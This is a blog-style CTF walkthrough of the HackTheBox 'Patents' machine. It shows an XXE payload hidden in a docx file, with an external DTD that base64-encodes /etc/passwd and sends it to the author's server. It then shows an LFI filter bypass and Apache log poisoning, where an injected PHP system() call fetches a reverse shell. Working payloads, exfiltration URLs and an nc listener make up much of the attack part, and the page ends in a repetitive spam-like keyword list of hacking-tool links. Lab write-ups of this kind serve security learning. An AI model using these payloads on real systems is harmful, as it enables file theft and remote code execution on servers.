torsdag den 20. august 2020

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc
cd doc
unzip ../sample.docx
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml
cd customXml
vim item1.xml
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>">
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx *
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>"
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3
Boom! we have a shell.

That's it for today's article see you next time.

References

Continue reading
  1. Hacker Tools Online
  2. Ethical Hacker Tools
  3. How To Hack
  4. Free Pentest Tools For Windows
  5. Hacking Tools Name
  6. Hacker Tools Linux
  7. How To Install Pentest Tools In Ubuntu
  8. Hack Tools For Pc
  9. Hacking Tools Usb
  10. How To Hack
  11. Hacker Tools Windows
  12. Hacker Tools Software
  13. Hack Tool Apk No Root
  14. Pentest Tools Tcp Port Scanner
  15. Hacker Tools List
  16. Hacking Tools Github
  17. Termux Hacking Tools 2019
  18. Hak5 Tools
  19. Pentest Tools Linux
  20. Hacker Security Tools
  21. Hacker Tools
  22. Wifi Hacker Tools For Windows
  23. Hacker Tools For Ios
  24. Hack Tools
  25. Beginner Hacker Tools
  26. Pentest Recon Tools
  27. Pentest Tools
  28. Hacking Tools And Software
  29. What Are Hacking Tools
  30. Hacking Tools For Windows Free Download
  31. Hack Tools Mac
  32. Pentest Tools Windows
  33. Hacking Tools For Kali Linux
  34. Blackhat Hacker Tools
  35. Pentest Tools Free
  36. Hacker Tools 2020
  37. Pentest Tools Nmap
  38. Hacker Techniques Tools And Incident Handling
  39. Hacking Tools For Beginners
  40. Hacking Tools Usb
  41. Tools 4 Hack
  42. Hacker Tools Mac
  43. Nsa Hacker Tools
  44. Hacking Tools Download
  45. Hacking Apps
  46. Best Hacking Tools 2019
  47. Hacker
  48. Bluetooth Hacking Tools Kali
  49. Hack Tools For Windows
  50. Tools Used For Hacking
  51. Hacking Tools Download
  52. Hacking Tools Pc
  53. What Are Hacking Tools
  54. Hacker Tools For Mac
  55. Hacking Tools Pc
  56. Hack Tools Download
  57. Hacker Tools Free Download
  58. Hacking Tools For Games
  59. Hacker Tools For Mac
  60. Hacker Search Tools
  61. Pentest Tools Tcp Port Scanner
  62. Nsa Hack Tools
  63. Pentest Tools
  64. Hacking Tools For Windows 7
  65. Hacker Tools
  66. Best Hacking Tools 2019
  67. Hacking Tools Hardware
  68. Tools For Hacker
  69. Hacking Tools For Pc
  70. Hacking Tools Windows
  71. Hack Tool Apk
  72. Hack And Tools
  73. Computer Hacker
  74. Tools For Hacker
  75. Hacker Tools Online
  76. Pentest Tools For Mac
  77. Hacking Tools For Beginners
  78. Pentest Tools Website
  79. Hacker Tools Apk Download
  80. Hack Rom Tools
  81. Usb Pentest Tools
  82. Hacking Tools Software
  83. Hak5 Tools
  84. Pentest Tools Kali Linux
  85. What Are Hacking Tools
  86. Pentest Reporting Tools
  87. Nsa Hack Tools Download
  88. Pentest Tools Website Vulnerability
  89. Hack Rom Tools
  90. Hack Tools Download
  91. Tools Used For Hacking
  92. Hacking Tools Windows 10
  93. Hacking Tools Usb
  94. Hack Tools Github
  95. Hack Tools 2019
  96. Beginner Hacker Tools
  97. Hack Tools Online
  98. Hacker Hardware Tools
  99. Hacking Tools 2019
  100. Pentest Tools Subdomain
  101. Hack Website Online Tool
  102. Easy Hack Tools
  103. Hack Tools Mac
  104. Hacker Tools 2019
  105. Pentest Box Tools Download
  106. What Is Hacking Tools
  107. Hacker Tools Mac
  108. Hacker Tools Github
  109. Tools 4 Hack
  110. Hack App
  111. Hacker Tools For Mac
  112. Hacking Tools For Beginners
  113. Kik Hack Tools
  114. Pentest Reporting Tools
  115. Hacking Tools And Software
  116. Hacking Tools Kit
  117. Hacker Tools Apk Download
  118. Beginner Hacker Tools
  119. Best Hacking Tools 2019
  120. Tools For Hacker
  121. Pentest Tools For Ubuntu
  122. Hack Tools
  123. Hacking Tools Hardware
  124. Hack Tools For Ubuntu
  125. Hacks And Tools
  126. Pentest Tools For Mac
  127. Pentest Tools For Android
  128. Hacking Tools Windows 10
  129. Hacker Tools 2019
  130. Pentest Tools Subdomain
  131. Pentest Tools Subdomain
  132. Bluetooth Hacking Tools Kali
  133. Pentest Tools For Ubuntu
  134. Ethical Hacker Tools
  135. Hacker Tools Hardware
  136. Underground Hacker Sites
  137. Hacker Tools Online
  138. Pentest Tools Port Scanner
  139. Hacker Security Tools
  140. Hacking Tools And Software
  141. Kik Hack Tools
  142. Hack Tools For Windows
  143. Hack Tools Download
  144. Pentest Tools Bluekeep
  145. How To Install Pentest Tools In Ubuntu
  146. Pentest Tools Kali Linux
  147. Hacking Tools For Windows Free Download
  148. New Hack Tools
  149. Hacking Tools For Kali Linux
  150. Top Pentest Tools
  151. Best Hacking Tools 2019
  152. Hak5 Tools
  153. Hack Tool Apk No Root
  154. Pentest Tools For Mac

Ingen kommentarer:

Send en kommentar